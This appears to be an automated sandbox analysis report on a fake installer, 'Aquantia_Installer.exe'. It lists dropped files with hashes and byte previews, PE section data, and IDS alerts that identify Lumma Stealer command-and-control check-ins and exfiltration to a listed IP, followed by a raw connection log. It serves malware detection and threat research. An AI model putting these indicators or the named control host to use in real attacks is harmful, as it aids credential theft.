                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.1.6.<./.P.i.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4825
                                                                      Entropy (8bit):4.529597210285371
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zsMJg77aI9bgWpW8VYrYm8M4JrZCZX2FT0+q8vRZXr2yN5vZSvZSDwM5d:uIjfKI7ZZ7VHJrQpKRh2WvkvkL5d
                                                                      MD5:64EDA103786F201592891003F98814D5
                                                                      SHA1:55BBD9C6B73AF6D07E0CDFCFF653669DD34A62D2
                                                                      SHA-256:1308FDA4D265936CF2A4BBFAC8B0E7C41C59FD0EC03AF5F0CB3B7EB2D4EA101E
                                                                      SHA-512:A62745F593A3D0C778790F525B1E13A086BF62F2D850E9D3DFA582DDD85852CB4F30B40F04C6BFD38D898230BB7BC42EF8D3037940976B4CDA3969D4E6F00C25
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600804" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                      Process:C:\Users\user\Desktop\Aquantia_Installer.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):448512
                                                                      Entropy (8bit):7.105586821924797
                                                                      Encrypted:false
                                                                      SSDEEP:12288:1nsPelYT8O1TWCE1ungB9mUzU4h/xqH3x89vIP9O9dAWITkUlf0UahDcWHlxNz4v:oelYT8O1TWCE1ungB9mUzU4h/xqH3x8V
                                                                      MD5:CCB3799AE097D2AF5F0CB59D159AACF0
                                                                      SHA1:494A99A981C357B4D41376708D07D9B7C5E0ED7F
                                                                      SHA-256:B846FBFF65F0DE69586BC493F12ACD5405F5B564BDE51B312F1F7330584E722D
                                                                      SHA-512:B19F5BBE567856888BD977E6C87EEB5DE0B3368FB26F7AA9DFFBF6CE96490CF80FB91046FE30A151236A5BB63D3B674987A9856841383863991CBAC9151089A7
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Reputation:low
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L....Ag...........!.........\......>.....................................................@.............................|.......P...............................@...\...............................x...@...............T............................text...H........................... ..`.rdata...\.......^..................@..@.data...............................@....reloc..@...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.422123795141498
                                                                      Encrypted:false
                                                                      SSDEEP:6144:sSvfpi6ceLP/9skLmb0OTVWSPHaJG8nAgeMZMMhA2fX4WABlEnND0uhiTwj:XvloTVW+EZMM6DFyh03wj
                                                                      MD5:C99B2FBA2E5307F5A7957CB25E955230
                                                                      SHA1:7A7CE9B62A52FBF73DB269B41C0117351143B8B6
                                                                      SHA-256:C6DDE9A287E8DFB3472DDD945E35247960119DEF7EF8B621EFFECBEDE928787F
                                                                      SHA-512:DD8F11E5A716D3C3A671278FE382622D3590C3E9F1153626147B72408E9691E7BE66FD6695158CFAFCE9FA2B032D9A5CCEA413D9ECF7769D9B5DBC61789EDFFE
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....=.................................................................................................................................................................................................................................................................................................................................................?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\Aquantia_Installer.exe
                                                                      File Type:ASCII text, with very long lines (353), with CRLF, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1414
                                                                      Entropy (8bit):4.54425498097833
                                                                      Encrypted:false
                                                                      SSDEEP:24:7v74NuQMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T47Mff2p8p14nrPKktp
                                                                      MD5:A7E0E8BE42DE3949E142E8C195D1BAB5
                                                                      SHA1:C938F76FB3FBDDDA219A137F1DB1C357154E62B8
                                                                      SHA-256:F68A17425C0304311B9960F327492EC3DBB8E7F398DA9F0EEE5DDCC643D64751
                                                                      SHA-512:19764A4EDC2040176693566174555141E1E45EA2159A66D38B6BE939315218C65401561850E7B718EF23CF4B6B51711D3A6780455A1AD61E9C237C708B9A9954
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "BenjaminFelixLiam" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStr
                                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.757226566069668
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Aquantia_Installer.exe
                                                                      File size:701'952 bytes
                                                                      MD5:a19287453762b8bed2b6a7ce68c413ca
                                                                      SHA1:3a2c2e5281803e16b7395aa02c2feede585acbf8
                                                                      SHA256:9cae15eb24885aae94012eba1f8cdfb39a08615f876897d8d056771e368b8a96
                                                                      SHA512:d7475ec1451da72793eaa1a7a12c2d3f4a30e2c5904ac834e03c91666cfc7fb7d74a2701e148dcab124b6b52e0fd652af4c36241da95219a227459518b9f7a9c
                                                                      SSDEEP:12288:OhYrnw0OYSSa6Hruex0S5AT6OYRbyA8Vd0lHx3vLrF5t8mpA+2L6osAtR5MkIzGB:OZEaWx0OOMnlHx395txpL2e
                                                                      TLSH:12E48DDC726072DFC867D472CEB82CA8EA91787B971F4617902706AD9A4C887CF151F2
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0.............. ....... ....@.. .......................@............@................................
                                                                      Icon Hash:00928e8e8686b000
                                                                      Entrypoint:0x4b200a
                                                                      Entrypoint Section:
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows cui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6741BFDD [Sat Nov 23 11:43:25 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [004B2000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8e6c40x57.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x650.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb20000x8
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x8e0000x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      4mh:*0x20000x8b4380x8b6004bf2897fe25283af3cb0ece1df396b52False1.0003170543721973data7.99971930966257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .text0x8e0000x1ef680x1f0002f3e3f19723daeeba0ad38d826e321e5False0.3296449722782258data4.694896891799402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xae0000x6500x80000811951e0718d5107c92dd2977b0f60False0.35205078125data3.5672348591962044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xb00000xc0x200bb7ed6253917948e1428bb2330be1c86False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      0xb20000x100x20054eb1c345046b335ebf878fbe869c080False0.044921875data0.12227588125913882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0xae0a00x3c4data0.4263485477178423
                                                                      RT_MANIFEST0xae4640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-23T15:21:56.676266+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704172.67.155.47443TCP
                                                                      2024-11-23T15:21:57.563162+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704172.67.155.47443TCP
                                                                      2024-11-23T15:21:57.563162+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704172.67.155.47443TCP
                                                                      2024-11-23T15:21:58.960386+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.155.47443TCP
                                                                      2024-11-23T15:21:59.681780+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706172.67.155.47443TCP
                                                                      2024-11-23T15:21:59.681780+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706172.67.155.47443TCP
                                                                      2024-11-23T15:22:01.305096+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.155.47443TCP
                                                                      2024-11-23T15:22:03.441953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.155.47443TCP
                                                                      2024-11-23T15:22:05.594550+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714172.67.155.47443TCP
                                                                      2024-11-23T15:22:08.097558+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716172.67.155.47443TCP
                                                                      2024-11-23T15:22:08.867406+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549716172.67.155.47443TCP
                                                                      2024-11-23T15:22:10.655733+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717172.67.155.47443TCP
                                                                      2024-11-23T15:22:14.603009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722172.67.155.47443TCP
                                                                      2024-11-23T15:22:15.336433+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549722172.67.155.47443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 23, 2024 15:21:55.393450022 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:55.393487930 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:55.393570900 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:55.394696951 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:55.394712925 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:56.676194906 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:56.676265955 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:56.698745966 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:56.698764086 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:56.699721098 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:56.751173973 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:56.870980024 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:56.871009111 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:56.871300936 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:57.563273907 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:57.563532114 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:57.563843012 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:57.565036058 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:57.565048933 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:57.565061092 CET49704443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:57.565064907 CET44349704172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:57.690931082 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:57.690949917 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:57.691040039 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:57.691368103 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:57.691380024 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:58.960316896 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:58.960386038 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:58.961698055 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:58.961704016 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:58.962734938 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:58.963993073 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:58.964006901 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:58.964160919 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.681833982 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.682025909 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.682101011 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.682112932 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.682204008 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.682248116 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.682255030 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.690269947 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.690330029 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.690336943 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.698561907 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.698609114 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.698615074 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.751132965 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.751137972 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.798007965 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.801192045 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.844918966 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.844933987 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.886204004 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.886269093 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.886277914 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.886457920 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:21:59.886521101 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.886715889 CET49706443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:21:59.886724949 CET44349706172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:00.035579920 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:00.035659075 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:00.035753965 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:00.036089897 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:00.036123037 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:01.304970980 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:01.305095911 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:01.306452990 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:01.306474924 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:01.307310104 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:01.317028999 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:01.317178011 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:01.317218065 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:02.055372000 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:02.055592060 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:02.055665970 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:02.055742979 CET49708443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:02.055780888 CET44349708172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:02.165401936 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:02.165446997 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:02.165582895 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:02.165874004 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:02.165894032 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:03.441843987 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:03.441952944 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:03.443332911 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:03.443344116 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:03.444267035 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:03.445518970 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:03.445655107 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:03.445714951 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:03.445790052 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:03.487334013 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:04.211608887 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:04.211843014 CET44349712172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:04.212002993 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:04.212002993 CET49712443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:04.373723984 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:04.373768091 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:04.373907089 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:04.374193907 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:04.374202967 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:05.594464064 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:05.594549894 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:05.596278906 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:05.596292019 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:05.596755028 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:05.606029034 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:05.606148958 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:05.606193066 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:05.606272936 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:05.606285095 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:06.482434988 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:06.482666969 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:06.482753038 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:06.482892990 CET49714443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:06.482913017 CET44349714172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:06.819696903 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:06.819742918 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:06.819822073 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:06.820380926 CET49716443192.168.2.5172.67.155.47
                                                                      Nov 23, 2024 15:22:06.820396900 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:08.097259045 CET44349716172.67.155.47192.168.2.5
                                                                      Nov 23, 2024 15:22:08.097558022 CET49716443192.168.2.5172.67.155.47
